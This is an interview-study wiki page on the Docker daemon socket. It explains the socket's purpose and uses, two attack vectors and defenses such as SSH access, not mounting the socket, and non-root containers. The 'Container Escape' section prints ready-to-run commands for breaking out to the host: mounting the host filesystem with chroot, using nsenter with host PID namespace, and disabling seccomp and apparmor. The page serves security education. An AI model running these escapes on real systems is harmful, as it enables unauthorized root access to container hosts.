Interview Bank
  • Interview Bank
  • Web
    • Persistent Connection and Non Persistent
    • CDN
    • Code Review
    • JWT
      • JWT vs Session Based Authentication
      • JWT Challenge
      • JWE
      • JWS
    • Content Security Policy (CSP)
    • Same-origin Policy (SOP)
    • Cross-Origin Resource Sharing (CORS)
      • Exploiting CORS
    • HTTP Strict Transport Security (HSTS)
    • SQL Injection (SQLi)
    • Password Encryption in Login APIs
    • API Security
      • API Principles
    • Simple bypass PHP
    • Server-side Template Injection (SSTI)
    • Javascript Object and Inheritance
    • HTTP/2
    • Cookie vs Local vs session Storage
    • XML External Entity (XXE)
    • What happened when enter domain name in browser
    • Prototype Pollution - Part 1
    • Prototype Pollution - Part 2
    • Nginx vs Apache
  • OT Security
    • Securing Operational Technology: Understanding OT Security
  • Quantum Computing
    • Quantum Computing: Unveiling the Cryptographic Paradigm Shift
    • Quantum Obfuscation: Shielding Code in the Quantum Era
  • DevSecOps
    • Continuous Integration/Continuous Deployment Pipeline Security
    • Chaos Engineering Overview
      • Security Chaos Engineering
    • Mysql VS redis
    • Kubernetes (k8s)
    • How MySQL executes query
    • REDIS
    • Difference between cache and buffer
  • Windows
    • Pentesting Active Directory - Active Directory 101
    • Pentesting Active Directory - Kerberos (Part 1)
    • Pentesting Active Directory - Kerberos (Part 2)
    • AD vs Kerberos vs LDAP
    • Active Directory Certificate Services Part 1
    • Unconstrained Delegation
    • AS-REP Roasting
    • NTLM Relay via SMB
    • LLMRN
    • Windows lateral movement
    • Constrained Delegation
    • Resource-Based Constrained Delegation
    • IFEO (lmage File Execution Options) Hijacking
  • UNIX
    • Setuid
  • Large Language Models (LLMs)
    • Tokens
    • LangChain
    • Integration and Security
  • Android
    • Keystore
  • Red team development
    • Secure C2 Infrastructure
    • P Invoke in c#
    • D Invoke
    • ExitProcess vs ExitThread
  • Blue Team
    • Indicators of Compromise
    • Methods to prevent Email domain spoofing
    • Windows Prefetching
  • CVE
    • XZ Outbreak CVE-2024-3094
    • Log4J Vulnerability (CVE-2021-44228)
    • SolarWinds Hack (CVE-2020-10148)
    • PHP CGI RCE (CVE-2024-4577)
    • Windows Recall
  • Software Architecture
    • Microservices
    • KVM
  • Docker
    • Overview
    • Daemon Socket
    • Tips to reduce docker size
  • Blockchain
    • Overview
    • Smart Contract
  • Business Acumen
    • Market Research Reports and Perception
    • Understanding Acquisitions
    • Cybersecurity as a Business Strategy
  • Cyber Teams
    • Introduction to Purple Teaming
  • Malware
    • Dynamic Sandbox Limitations
Powered by GitBook
On this page
  • Main Purpose
  • Uses Cases
  • Attack Vectors
  • Privilege Escalation via Mount
  • Container Escape
  • Defenses
  • Use SSH
  • Ensure Socket is not Mounted
  • Run containers as non-root users
  • Interview Questions
  • Author
  • References
  1. Docker

Daemon Socket

Main Purpose

Main entry point and persistent process for Docker API on host OS by interfacing with underlying host kernel. UNIX socket is used by default as compared to TCP to prevent remote connection from unknown sources "hosts": ["unix:///var/run/docker.sock"]

Uses Cases

  • Proxy configurations if container is behind an HTTP proxy server

  • Interacting with other containers

  • Logging purposes

Attack Vectors

Privilege Escalation via Mount

Different parts of filesystem can be mounted in container with root access because docker socket runs as root. This allows escalation of privileges within the container to root privileges and potentially, enabling attackers access and modity host filesystem.

-v /:/host
-v /tmp:/host

Container Escape

If container happens to run as privilege or container has improper access control, it is possible to remove all isolation from container and execute commands on actual host system.

#Search the socket
find / -name docker.sock 2>/dev/null
#It's usually in /run/docker.sock
#List images to use one
docker images
#Run the image mounting the host disk and chroot on it
docker run -it -v /:/host/ ubuntu:18.04 chroot /host/ bash

# Get full access to the host via ns pid and nsenter cli
docker run -it --rm --pid=host --privileged ubuntu bash
nsenter --target 1 --mount --uts --ipc --net --pid -- bash

# Get full privs in container without --privileged
docker run -it -v /:/host/ --cap-add=ALL --security-opt apparmor=unconfined --security-opt seccomp=unconfined --security-opt label:disable --pid=host --userns=host --uts=host --cgroupns=host ubuntu chroot /host/ bash

Access control plugins can also be bypassed:

Defenses

Use SSH

If remote connection is needed, use SSH on DOCKER_HOST to ensure only SSH remote connections are permitted and not via TCP due to security reasons. TLS with CA cert can be used as an alternative.

 export DOCKER_HOST=ssh://docker-user@host1.example.com
 docker info
<prints output of the remote engine>

Ensure Socket is not Mounted

Run -v /var/run/docker.sock:/var/run/docker.sock to ensure socket flag is not present within the container. Do not run docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu /bin/bash.

Run containers as non-root users

Reduce container user privileges by running as non-root.

# Runtime example
docker run -d -u 1000 ubuntu sleep infinity
ps aux | grep sleep
> 1000 ... sleep infinity

# Build example
FROM ubuntu:latest
USER 1000

Additional information:

Interview Questions

  • What is Docker Socket used for?

  • What are the attack vectors using the socket?

  • Explain some mitigation methods to prevent socket abuse. (Can list more examples not written here)

Author

References

PreviousOverviewNextTips to reduce docker size

Last updated 1 year ago

🍞

Zheng Jie
Docker - Daemon
StackOverflow - Purpose of docker sock file
Docker - Use SSH to protect Docker Daemon Socket
HackTricks- Docker Socket Privilege Escalation
Peter - Docker Security Best Practices
OWASP - Docker Seucrity
Google - Best Practices for Operating Containers
LogoDocker Security - OWASP Cheat Sheet Series
LogoAuthZ& AuthN - Docker Access Authorization Plugin | HackTricks | HackTricks
LogoBest practices for operating containers  |  Cloud Architecture Center  |  Google CloudGoogle Cloud